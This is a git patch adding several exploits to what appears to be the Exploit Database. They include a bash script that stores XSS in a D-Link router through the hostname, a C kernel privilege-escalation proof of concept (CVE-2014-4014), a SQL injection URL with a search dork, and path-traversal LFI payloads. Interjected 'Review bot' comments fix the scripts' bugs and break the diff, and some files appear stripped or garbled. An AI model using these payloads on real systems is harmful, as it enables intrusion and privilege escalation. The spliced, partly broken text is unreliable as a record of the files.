From 82e917475d1c308495059c25bf34adf0acd12029 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sun, 22 Jun 2014 04:39:30 +0000
Subject: [PATCH] Updated 06_22_2014
---
 files.csv | 7 +++
 platforms/hardware/webapps/33822.sh | 32 ++++++++++++
 platforms/linux/dos/33672.txt | 11 ++++
 platforms/linux/local/33824.c | 72 ++++++++++++++++++++++++++
 platforms/php/webapps/33809.txt | 21 ++++++++
 platforms/php/webapps/33820.txt | 10 ++++
 platforms/php/webapps/33821.html | 9 ++++
 platforms/php/webapps/33823.txt | 80 +++++++++++++++++++++++++++++
 8 files changed, 242 insertions(+)
 create mode 100755 platforms/hardware/webapps/33822.sh
 create mode 100755 platforms/linux/dos/33672.txt
 create mode 100755 platforms/linux/local/33824.c
 create mode 100755 platforms/php/webapps/33809.txt
 create mode 100755 platforms/php/webapps/33820.txt
 create mode 100755 platforms/php/webapps/33821.html
 create mode 100755 platforms/php/webapps/33823.txt
diff --git a/files.csv b/files.csv
index 7ecf8ad17..8a3b9fdf4 100755
--- a/files.csv
+++ b/files.csv
@@ -30336,6 +30336,7 @@ id,file,description,date,author,platform,type,port
 33664,platforms/multiple/remote/33664.html,"Mozilla Firefox <= 3.5.8 Style Sheet Redirection Information Disclosure Vulnerability",2010-01-09,"Cesar Cerrudo",multiple,remote,0
 33665,platforms/php/webapps/33665.txt,"Softbiz Jobs 'sbad_type' Parameter Cross Site Scripting Vulnerability",2010-02-23,"pratul agrawal",php,webapps,0
 33671,platforms/php/webapps/33671.txt,"MySmartBB 1.7 Multiple Cross Site Scripting Vulnerabilities",2010-02-24,indoushka,php,webapps,0
+33672,platforms/linux/dos/33672.txt,"Kojoney 0.0.4.1 - 'urllib.urlopen()' Remote Denial of Service Vulnerability",2010-02-24,Nicob,linux,dos,0
 33673,platforms/php/webapps/33673.pl,"HD FLV Player Component for Joomla! 'id' Parameter SQL Injection Vulnerability",2010-02-24,kaMtiEz,php,webapps,0
 33674,platforms/php/webapps/33674.txt,"OpenInferno OI.Blogs 1.0 Multiple Local File Include Vulnerabilities",2010-02-24,JIKO,php,webapps,0
 33675,platforms/jsp/webapps/33675.txt,"Multiple IBM Products Login Page Cross Site Scripting Vulnerability",2010-02-25,"Oren Hafif",jsp,webapps,0
@@ -30456,6 +30457,7 @@ id,file,description,date,author,platform,type,port
 33804,platforms/windows/dos/33804.pl,"Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow Vulnerability",2014-06-18,LiquidWorm,windows,dos,0
 33807,platforms/multiple/remote/33807.rb,"Rocket Servergraph Admin Center fileRequestor Remote Code Execution",2014-06-18,metasploit,multiple,remote,8888
 33808,platforms/linux/local/33808.c,"docker 0.11 VMM-container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0
+33809,platforms/php/webapps/33809.txt,"Cacti Superlinks Plugin 1.4-2 - SQL Injection",2014-06-18,Napsterakos,php,webapps,0
 33810,platforms/osx/remote/33810.html,"Apple Safari for iPhone/iPod touch Malformed 'Throw' Exception Remote Code Execution Vulnerability",2010-03-26,"Nishant Das Patnaik",osx,remote,0
 33811,platforms/osx/remote/33811.html,"Apple Safari iPhone/iPod touch Malformed Webpage Remote Code Execution Vulnerability",2010-03-26,"Nishant Das Patnaik",osx,remote,0
 33812,platforms/php/webapps/33812.txt,"Joomla! 'com_weblinks' Component 'id' Parameter SQL Injection Vulnerability",2010-03-29,"Pouya Daneshmand",php,webapps,0
@@ -30466,3 +30468,8 @@ id,file,description,date,author,platform,type,port
 33817,platforms/windows/remote/33817.rb,"Ericom AccessNow Server Buffer Overflow",2014-06-19,metasploit,windows,remote,8080
 33818,platforms/php/webapps/33818.txt,"web2Project 3.1 - Multiple Vulnerabilities",2014-06-19,"High-Tech Bridge SA",php,webapps,80
 33819,platforms/windows/dos/33819.txt,"McAfee Email Gateway Prior To 6.7.2 Hotfix 2 Multiple Vulnerabilities",2010-04-06,"Nahuel Grisolia",windows,dos,0
+33820,platforms/php/webapps/33820.txt,"PotatoNews 1.0.2 'nid' Parameter Multiple Local File Include Vulnerabilities",2010-04-07,mat,php,webapps,0
+33821,platforms/php/webapps/33821.html,"n-cms-equipe 1.1c.Debug Multiple Local File Include Vulnerabilities",2010-02-24,ITSecTeam,php,webapps,0
+33822,platforms/hardware/webapps/33822.sh,"D-link DSL-2760U-E1 - Persistent XSS",2014-06-21,"Yuval tisf Nativ",hardware,webapps,0
+33823,platforms/php/webapps/33823.txt,"Wordpress 3.9.1 - CSRF vulnerabilities",2014-06-21,"Avinash Thapa",php,webapps,0
+33824,platforms/linux/local/33824.c,"Linux Kernel <= 3.13 - Local Privilege Escalation PoC (gid)",2014-06-21,"Vitaly Nikolenko",linux,local,0
diff --git a/platforms/hardware/webapps/33822.sh b/platforms/hardware/webapps/33822.sh
new file mode 100755
index 000000000..136485c67
--- /dev/null
+++ b/platforms/hardware/webapps/33822.sh
@@ -0,0 +1,32 @@
+#!/bin/bash
+
+# Written and discovered by Yuval tisf Nativ
+# The page 'dhcpinfo.html' will list all machines connected to the network with hostname,
+# IP, MAC and IP expiration. It is possible to store an XSS in this table by changing hostname.
+
+# Checks if you are root
+if [ "$(id -u)" != "0" ]; then
+ echo "Please execute this script as root"
+ exit 1
+fi
+
+# You're XSS here
+xss = "\""
+
+# backup current hostname
+currhost = `hostname`
+
+# Bannering
+echo ""
+echo " D-Link Persistent XSS by tisf"
+echo ""
+echo "The page dhcpinfo.html is the vulnerable page."
+echo "Ask the user to access it and your persistent XSS will be triggered."
+echo ""
+
+# Change hostname to XSS
+sudo hosname $xss
+
+# Restore previous hostname on exit
+pause "Type any key to exit and restore your previous hostname."
+sudo hostname $currhost
diff --git a/platforms/linux/dos/33672.txt b/platforms/linux/dos/33672.txt
new file mode 100755
index 000000000..db18af034
--- /dev/null
+++ b/platforms/linux/dos/33672.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/38395/info
+
+Kojoney is prone to a remote denial-of-service vulnerability.
+
+A remote attacker can exploit this issue to gain unauthorized access to local files and crash the affected application, resulting in a denial-of-service condition.
+
+Versions prior to Kojoney 0.0.4.2 are vulnerable.
+
+The following example URI is available:
+
+file://localhost/dev/urandom
\ No newline at end of file
diff --git a/platforms/linux/local/33824.c b/platforms/linux/local/33824.c
new file mode 100755
index 000000000..c669bbb35
--- /dev/null
+++ b/platforms/linux/local/33824.c
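Review bot: The hostname restore at the end of 33822.sh cannot work: `currhost = \`hostname\`` has spaces around `=`, so bash runs a command named `currhost` instead of assigning, the variable stays empty, and the final `sudo hostname $currhost` merely prints the current name; the `xss = ...` line is malformed the same way. Write `currhost=$(hostname)` and restore with `sudo hostname -- "$currhost"`, and register it as `trap 'sudo hostname -- "$currhost"' EXIT` so an interrupted run does not leave the tester's own machine with a corrupted hostname. `pause` is not a bash builtin, so that line always fails; a `read -r -p` prompt is the equivalent for the behaviour the comment describes. The script also insists on uid 0 and then prefixes every privileged call with `sudo`, which is redundant.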
@@ -0,0 +1,72 @@
+/**
+ * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC
+ *
+ * Vitaly Nikolenko
+ * http://hashcrack.org
+ *
+ * Usage: ./poc [file_path]
+ *
+ * where file_path is the file on which you want to set the sgid bit
+ */
+#define _GNU_SOURCE
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define STACK_SIZE (1024 * 1024)
+static char child_stack[STACK_SIZE];
+
+struct args {
+ int pipe_fd[2];
+ char *file_path;
+};
+
+static int child(void *arg) {
+ struct args *f_args = (struct args *)arg;
+ char c;
+
+ // close stdout
+ close(f_args->pipe_fd[1]);
+
+ assert(read(f_args->pipe_fd[0], &c, 1) == 0);
+
+ // set the setgid bit
+ chmod(f_args->file_path, S_ISGID|S_IRUSR|S_IWUSR|S_IRGRP|S_IXGRP|S_IXUSR);
+
+ return 0;
+}
+
+int main(int argc, char *argv[]) {
+ int fd;
+ pid_t pid;
+ char mapping[1024];
+ char map_file[PATH_MAX];
+ struct args f_args;
+
+ assert(argc == 2);
+
+ f_args.file_path = argv[1];
+ // create a pipe for synching the child and parent
+ assert(pipe(f_args.pipe_fd) != -1);
+
+ pid = clone(child, child_stack + STACK_SIZE, CLONE_NEWUSER | SIGCHLD, &f_args);
+ assert(pid != -1);
+
+ // get the current uid outside the namespace
+ snprintf(mapping, 1024, "0 %d 1\n", getuid());
+
+ // update uid and gid maps in the child
+ snprintf(map_file, PATH_MAX, "/proc/%ld/uid_map", (long) pid);
+ fd = open(map_file, O_RDWR); assert(fd != -1);
+
+ assert(write(fd, mapping, strlen(mapping)) == strlen(mapping));
+ close(f_args.pipe_fd[1]);
+
+ assert (waitpid(pid, NULL, 0) != -1);
+}
diff --git a/platforms/php/webapps/33809.txt b/platforms/php/webapps/33809.txt
new file mode 100755
index 000000000..2be23895f
--- /dev/null
+++ b/platforms/php/webapps/33809.txt
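Review bot: The `chmod` call in child() discards its return value, so the program exits 0 and prints nothing whether or not the kernel honoured the mode change; for a PoC whose only purpose is to tell a patched kernel from an affected one, that result should be reported, e.g. `if (chmod(f_args->file_path, S_ISGID|S_IRUSR|S_IWUSR|S_IRGRP|S_IXGRP|S_IXUSR) != 0) perror("chmod");`. In main() the descriptor from `open(map_file, O_RDWR)` is never closed, and the assert compares `write()`'s ssize_t with the size_t from `strlen()`, which compilers warn about; `close(fd)` after the write and a cast of one side to the other fixes both. The comment `// close stdout` above `close(f_args->pipe_fd[1])` is wrong, it closes the pipe's write end, and should read `// close our copy of the pipe's write end so read() below sees EOF when the parent closes its copy`. The nine `#include` lines carry no header names in this rendering, which looks like an extraction artefact rather than the committed file, but is worth confirming against the stored copy.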
@@ -0,0 +1,21 @@
+ $$$$$$\ $$\ $$\ $$$$$$\
+$$ __$$\ $$ | $$ | $$ __$$\
+$$ / \__| $$ | $$ | $$ / \__|
+$$ |$$$$\ $$$$$$$$ | \$$$$$$\
+$$ |\_$$ | $$ __$$ | \____$$\
+$$ | $$ | $$ | $$ | $$\ $$ |
+\$$$$$$ |$$\ $$ | $$ |$$\\$$$$$$ |
+ \______/ \__|\__| \__|\__|\______/
+
+# Exploit Title: Cacti - Superlinks Plugin SQL Injection
+# Google Dork: inurl:"/cacti/plugins/superlinks/"
+# Date: 18/06/2014
+# Exploit Author: Napsterakos
+# Software Link: http://docs.cacti.net/plugin:superlinks
+
+
+Link: http://localhost/cacti/plugins/superlinks/
+
+Exploit: http://localhost/cacti/plugins/superlinks/superlinks.php?id=[SQLi]
+
+Credits to: Greek Hacking Scene
\ No newline at end of file
diff --git a/platforms/php/webapps/33820.txt b/platforms/php/webapps/33820.txt
new file mode 100755
index 000000000..8fd801266
--- /dev/null
+++ b/platforms/php/webapps/33820.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/39276/info
+
+PotatoNews is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+PotatoNews 1.0.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/newcopy/timeago.php?nid=../../../../../../../[file]%00
+http://www.example.com/update/timeago.php?nid=../../../../../../../[file]%00
\ No newline at end of file
diff --git a/platforms/php/webapps/33821.html b/platforms/php/webapps/33821.html
new file mode 100755
index 000000000..5afe0c4a9
--- /dev/null
+++ b/platforms/php/webapps/33821.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/39298/info
+
+n-cms-equipe is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+n-cms-equipe 1.1C-Debug is vulnerable; other versions may also be affected.
+
+ #####coded by ahmadbady#####

N'CMS & N'Games local file include Vulnerability

vul1 file:/path/template/theme1/content/body.php

vul2 file:/path/template/theme1/content/includs.php

-----------------------------------

victim: path: file:    lfi code: 


 

\ No newline at end of file
diff --git a/platforms/php/webapps/33823.txt b/platforms/php/webapps/33823.txt
new file mode 100755
index 000000000..0e7ea04e1
--- /dev/null
+++ b/platforms/php/webapps/33823.txt
@@ -0,0 +1,80 @@
+# EXPLOIT TITLE:Wordpress 3.9.1-CSRF vulnerability
+# DATE:21st June,2014
+
+# Author:Avinash Kumar Thapa
+
+#URL: localhost/wordpress/
+
+#PATCH/FIX:Not fixed yet.
+
+
+
+
+###################################################################################################
+
+Technical Details:
+
+This is the new version released by Wordpress.
+
+version is 3.9.1(Latest)
+
+##Cross site request Forgery(CSRF) is present in this version at the url shown:http://localhost/wordpress/wp-comments-post.php##
+
+
+
+
+#####################################################################################################
+
+Exploit Code:
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+###########################################################################################################
+
+----
+
+-- Avinash
+
+a.k.a
+
+**SPID3R**
+
+
+
+
+twitter: @m_avinash143
\ No newline at end of file